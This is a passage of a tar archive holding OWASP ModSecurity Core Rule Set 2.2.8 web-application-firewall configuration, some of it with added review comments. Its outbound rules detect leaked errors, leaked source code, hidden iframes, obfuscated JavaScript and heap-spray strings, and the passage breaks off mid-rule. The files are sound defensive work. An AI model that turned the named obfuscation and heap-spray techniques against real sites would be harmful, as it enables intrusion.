#SecRule TX:'/^950001.*ARGS:comments/' ".*" "chain,phase:2,t:none,nolog,pass"
# SecRule MATCHED_VAR_NAME "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-20"

#
# This is an example exclusion for the entire SQL Injection category of rules
#
#SecRule TX:'/SQL_INJECTION/' ".*" "phase:2,t:none,nolog,pass,chain,setvar:tx.sql_injection=+1,setvar:tx.sql_injection_%{tx.sql_injection}=%{matched_var_name}"
# SecRule TX:'/^SQL_INJECTION_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-20"

#
# This is an example exclusion that combines the URL and parameter and removes
# a specific SQL Injection ID only if the parameter foo payload matches
#
#SecRule REQUEST_FILENAME "@streq /path/to/file.php" "chain,phase:2,t:none,nolog,pass"
# SecRule TX:'/^950001.*ARGS:foo/' "@streq Item 1=1" "chain,t:none"
# SecRule MATCHED_VAR_NAME "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-20"
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_49_inbound_blocking.conf��������0000664�0000000�0000000�00000003456�12164572564�0032647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # Uncomment the anomaly sections you wish to use. # These rules use the anomaly score settings specified in the 10 config file. # You should also set the desired disruptive action (deny, redirect, etc...). 
# # Alert and Block based on Anomaly Score and OSVDB Check # SecRule TX:ANOMALY_SCORE "@gt 0" \ "chain,phase:2,id:'981175',t:none,deny,log,msg:'Inbound Attack Targeting OSVDB Flagged Resource.',setvar:tx.inbound_tx_msg=%{tx.msg},setvar:tx.inbound_anomaly_score=%{tx.anomaly_score}" SecRule RESOURCE:OSVDB_VULNERABLE "@eq 1" chain SecRule TX:ANOMALY_SCORE_BLOCKING "@streq on" # Alert and Block based on Anomaly Scores # SecRule TX:ANOMALY_SCORE "@gt 0" \ "chain,phase:2,id:'981176',t:none,deny,log,msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.ANOMALY_SCORE}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}): Last Matched Message: %{tx.msg}',logdata:'Last Matched Data: %{matched_var}',setvar:tx.inbound_tx_msg=%{tx.msg},setvar:tx.inbound_anomaly_score=%{tx.anomaly_score}" SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_level}" chain SecRule TX:ANOMALY_SCORE_BLOCKING "@streq on" chain SecRule TX:/^\d+\-/ "(.*)" # Alert and Block on a specific attack category such as SQL Injection # #SecRule TX:SQL_INJECTION_SCORE "@gt 0" \ # "phase:2,t:none,log,block,msg:'SQL Injection Detected (score %{TX.SQL_INJECTION_SCORE}): %{tx.msg}'" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_50_outbound.conf����������������0000664�0000000�0000000�00000053500�12164572564�0031163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 
2006-2012 Trustwave All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# NOTE By default the status code sent is 501, which implies that the web
# server does not support the required operation. This is a non standard use
# of this status code which normally refers to unsupported HTTP methods.
# It is used in order to confuse automated clients and scanners.
#
# NOTE(review): none of the rules in this part of the file carries a status
# action; each uses "block", so the response code presumably comes from
# SecDefaultAction or from the outbound blocking rule - confirm that the 501
# statement above still holds.
#
# Common shape of the rules below: each runs in phase 4, captures the match
# into TX.0, copies the rule message into tx.msg, adds tx.error_anomaly_score
# to both tx.outbound_anomaly_score and tx.anomaly_score, and (except 970018)
# records the matched text in a TX variable named
# <rule id>-<category>-<matched variable name>. In a chain these setvar actions
# sit on the last rule, so they run only when every condition has matched.
#
# RESPONSE_BODY rules can only match when ModSecurity buffers the response
# body; that depends on settings outside this file (SecResponseBodyAccess,
# SecResponseBodyMimeType, SecResponseBodyLimit) - confirm them, otherwise
# these rules see nothing.
#
# ctl:auditLogParts=+E adds the response body to the audit log entry. The
# audit log then holds the leaked content itself, so restrict access to it.
#

# Zope Information Leakage
SecRule RESPONSE_BODY "<h2>Site Error<\/h2>.{0,20}<p>An error was encountered while publishing this resource\." \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Zope Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970007',tag:'OWASP_CRS/LEAKAGE/ERRORS_ZOPE',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}"

# CF Information Leakage
SecRule RESPONSE_BODY "\bThe error occurred in\b.{0,100}: line\b.{0,1000}\bColdFusion\b.*?\bStack Trace \(click to expand\)" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Cold Fusion Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970008',tag:'OWASP_CRS/LEAKAGE/ERRORS_CF',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}"

# PHP Information Leakage
SecRule RESPONSE_BODY "<b>Warning<\/b>.{0,100}?:.{0,1000}?\bon line\b" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'PHP Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970009',tag:'OWASP_CRS/LEAKAGE/ERRORS_PHP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}"

# ISA server existence revealed
SecRule RESPONSE_BODY "\b403 Forbidden\b.*?\bInternet Security and Acceleration Server\b" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'ISA server existence revealed',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970010',tag:'MISCONFIGURATION',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-MISCONFIGURATION-%{matched_var_name}=%{tx.0}"

# Microsoft Office document properties leakage
# Unlike its neighbours, this rule has no ctl:auditLogParts=+E, so a match does
# not add the response body to the audit log.
SecRule RESPONSE_BODY "<o:documentproperties>" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,block,msg:'Microsoft Office document properties leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970012',tag:'OWASP_CRS/LEAKAGE/INFO_STATISTICS',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}"

# ASP/JSP source code leakage (chain 970903): the body contains "<%" AND does
# not match the second pattern, a negated list of media/document signature
# strings (gif, riff, flv, %pdf, ...) - presumably there to avoid flagging
# binary content; confirm.
# NOTE(review): the second pattern is matched with t:none and carries no
# case-insensitive flag, and its last alternative requires a literal capital
# "B" before "%pdf" / ".ra" (possibly meant as the \B assertion) - confirm the
# exclusion behaves as intended.
SecRule RESPONSE_BODY "\<\%" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'ASP/JSP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970903',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_ASP_JSP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'"
        SecRule RESPONSE_BODY "!(?:\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b)" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}"

# CF source code leakage
# The pattern is the three characters "<cf" with t:none, so any response body
# containing that lowercase sequence matches.
SecRule RESPONSE_BODY "<cf" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Cold Fusion source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970016',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_CF',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}"

# IIS default location
# Chain 970018: the lowercased body contains "<drive>:\inetpub" AND the
# variable GLOBAL:alerted_970018_iisDefLoc does not exist yet. The chained rule
# then creates that variable, so the finding scores only while the flag is
# unset. No per-match TX variable is recorded for this rule.
# NOTE(review): no expirevar is visible for the flag and the GLOBAL collection
# is initialised outside this view; how long the finding stays suppressed
# depends on that collection's lifetime - confirm.
SecRule RESPONSE_BODY "[a-z]:\\\\inetpub\b" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,t:lowercase,ctl:auditLogParts=+E,block,msg:'IIS installed in default location',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970018',severity:'3',chain"
        SecRule &GLOBAL:alerted_970018_iisDefLoc "@eq 0" "setvar:global.alerted_970018_iisDefLoc,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score}"

# The application is not available
# 970901 matches any three-digit 5xx response status, so an ordinary upstream
# error adds tx.error_anomaly_score to the outbound score on its own. Keep this
# in mind when choosing the outbound blocking threshold.
SecRule RESPONSE_STATUS "^5\d{2}$" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'The application is not available',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970901',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-AVAILABILITY/APP_NOT_AVAIL-%{matched_var_name}=%{tx.0}"

# 970118: same message and category as 970901, matched on error text in the
# response body (SQL Server timeout messages and two generic server error
# texts) instead of the status code.
SecRule RESPONSE_BODY "(?:Microsoft OLE DB Provider for SQL Server(?:<\/font>.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)<br>Timeout expired<br>)|<h1>internal server error<\/h1>.*?<h2>part of the server has crashed or it has a configuration error\.<\/h2>|cannot connect to the server: timed out)" \
        "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'The application is not available',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970118',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-AVAILABILITY/APP_NOT_AVAIL-%{matched_var_name}=%{tx.0}"

# Weblogic information disclosure
# Chain 970021: response status is exactly 500 AND the body contains the
# "JSP compile error" page title.
SecRule RESPONSE_STATUS "^500$" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'WebLogic information disclosure',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970021',severity:'3'"
        SecRule RESPONSE_BODY "<title>JSP compile error<\/title>" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}"

#
File or Directory Names Leakage SecRule RESPONSE_BODY "href\s?=[\s\"\']*[A-Za-z]\:\x5c([^\"\']+)" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,capture,t:none,capture,ctl:auditLogParts=+E,block,msg:'File or Directory Names Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970011',tag:'OWASP_CRS/LEAKAGE/INFO_FILE',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule TX:1 "!program files\x5cmicrosoft office\x5c(?:office|templates)" "t:none,capture,t:lowercase,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" # # IFrame Injection # SecRule RESPONSE_BODY "!@pm iframe" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'6',id:'981177',t:none,capture,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,pass,nolog,skipAfter:END_IFRAME_CHECK" SecRule RESPONSE_BODY "<\W*iframe[^>]+?\b(?:width|height)\b\W*?=\W*?[\"']?[^\"'1-9]*?(?:(?:20|1?\d(?:\.\d*)?)(?![\d%.])|[0-3](?:\.\d*)?%)" \ "t:replaceComments,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Possibly malicious iframe tag in output',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'981000',tag:'OWASP_CRS/OWASP_CRS/MALICIOUS_IFRAME',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_IFRAME-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "<\W*iframe[^>]+?\bstyle\W*?=\W*?[\"']?\W*?\bdisplay\b\W*?:\W*?\bnone\b" \ "t:replaceComments,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',ctl:auditLogParts=+E,block,msg:'Possibly malicious iframe tag in output',logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'981001',tag:'OWASP_CRS/OWASP_CRS/MALICIOUS_IFRAME',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_IFRAME-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i:<\s*IFRAME\s*?[^>]*?src=\"javascript:)" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Malicious iframe+javascript tag in output',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'981003',tag:'OWASP_CRS/OWASP_CRS/MALICIOUS_IFRAME',tag:'bugtraq,13544',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_IFRAME-%{matched_var_name}=%{tx.0}" SecMarker END_IFRAME_CHECK # # Generic Malicious JS Detection # SecRule RESPONSE_BODY "(?i)(String\.fromCharCode\(.*?){4,}" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Excessive fromCharCode',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981004',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i)(eval\(.{0,15}unescape\()" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Eval+Unescape',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',id:'981005',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i)(var[^=]+=\s*unescape\s*;)" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Unescape',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981006',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i:%u0c0c%u0c0c|%u9090%u9090|%u4141%u4141)" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Heap Spray',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981007',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" # # Run PM check against response body data before running any RegEx Checks # If nothing matches, then we skip the remainder of phase:4 # SecRule RESPONSE_BODY "!@pmFromFile modsecurity_50_outbound.data" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',pass,id:'981178',t:none,capture,t:urlDecodeUni,t:htmlEntityDecode,nolog,skipAfter:END_OUTBOUND_CHECK" # ASP/JSP source code leakage SecRule RESPONSE_BODY 
"(?:\b(?:(?:s(?:erver\.(?:(?:(?:htm|ur)lencod|execut)e|createobject|mappath)|cripting\.filesystemobject)|(?:response\.(?:binary)?writ|vbscript\.encod)e|wscript\.(?:network|shell))\b|javax\.servlet)|\.(?:(?:(?:createtex|ge)t|loadfrom)file|addheader)\b|<jsp:)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'ASP/JSP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970014',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_ASP_JSP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" # PHP source code leakage SecRule RESPONSE_BODY "(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'PHP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970015',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "<\?(?!xml)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'PHP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',id:'970902',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule RESPONSE_BODY "!(?:\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b)" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" # Statistics pages revealed SecRule RESPONSE_BODY "\b(?:Th(?:is (?:summary was generated by.{0,100}?(?:w(?:ebcruncher|wwstat)|analog|Jware)|analysis was produced by.{0,100}?(?:calamaris|EasyStat|analog)|report was generated by WebLog)|ese statistics were produced by (?:getstats|PeLAB))|[gG]enerated by.{0,100}?[Ww]ebalizer)\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Statistics Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970002',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" # SQL Errors leakage SecRule RESPONSE_BODY "(?:\b(?:(?:s(?:elect list because it is not contained in (?:an aggregate function and there is no|either an aggregate function or the) GROUP BY clause|upplied argument is not a valid (?:PostgreSQL result|O(?:racle|DBC)|M(?:S |y)SQL))|S(?:yntax error converting the \w+ value .*? to a column of data type|QL Server does not exist or access denied)|Either BOF or EOF is True, or the current record has been deleted(. Requested|; the operation)|The column prefix .{0,50}? does not match with a table name or alias name used in the query|Could not find server '\w+' in sysservers\. 
execute sp_addlinkedserver)\b|microsoft jet database engine error '8|Microsoft Access Driver|JET Database Engine|Access Database Engine|ORA-\d{5}: |ORA-[0-9][0-9][0-9][0-9]|Oracle error|Oracle.*?Driver|Warning.*?Woci_.*?|Warning.*?Wora_.*?|Un(?:closed quotation mark before the character string\b|able to connect to PostgreSQL server:)|PostgreSQL query failed:|PostgreSQL.*?ERROR|Warning.*?Wpg_.*?|valid PostgreSQL result|Npgsql.|(?:Microsoft OLE DB Provider for .{0,30} [eE]rror |error '800a01b8)'|You have an error in your SQL syntax(?: near ')?|incorrect syntax near (?:\'|the\b|\@\@error\b)|cannot take a \w+ data type as an argument\.|Warning: mysql_connect\(\):)|\[Microsoft\]\[ODBC |Driver.*? SQL[-_ ]*Server|OLE DB.*? SQL Server|(W|A)SQL Server.*?Driver|Warning.*?mssql_.*?|(W|A)SQL Server.*?[0-9a-fA-F]{8}|Exception Details:.*?WSystem.Data.SqlClient.|Exception Details:.*?WRoadhouse.Cms.|SQL syntax.*?MySQL|Warning.*?mysql_.*?|valid MySQL result|MySqlClient.|SQLite\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*?sqlite_.*?|Warning.*?SQLite3::)" \ "phase:4,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'SQL Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970003',tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # IIS Errors leakage SecRule RESPONSE_BODY "(?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application uses a value of the wrong type for the current operation\b|error')| trappable error occurred in an external object\. 
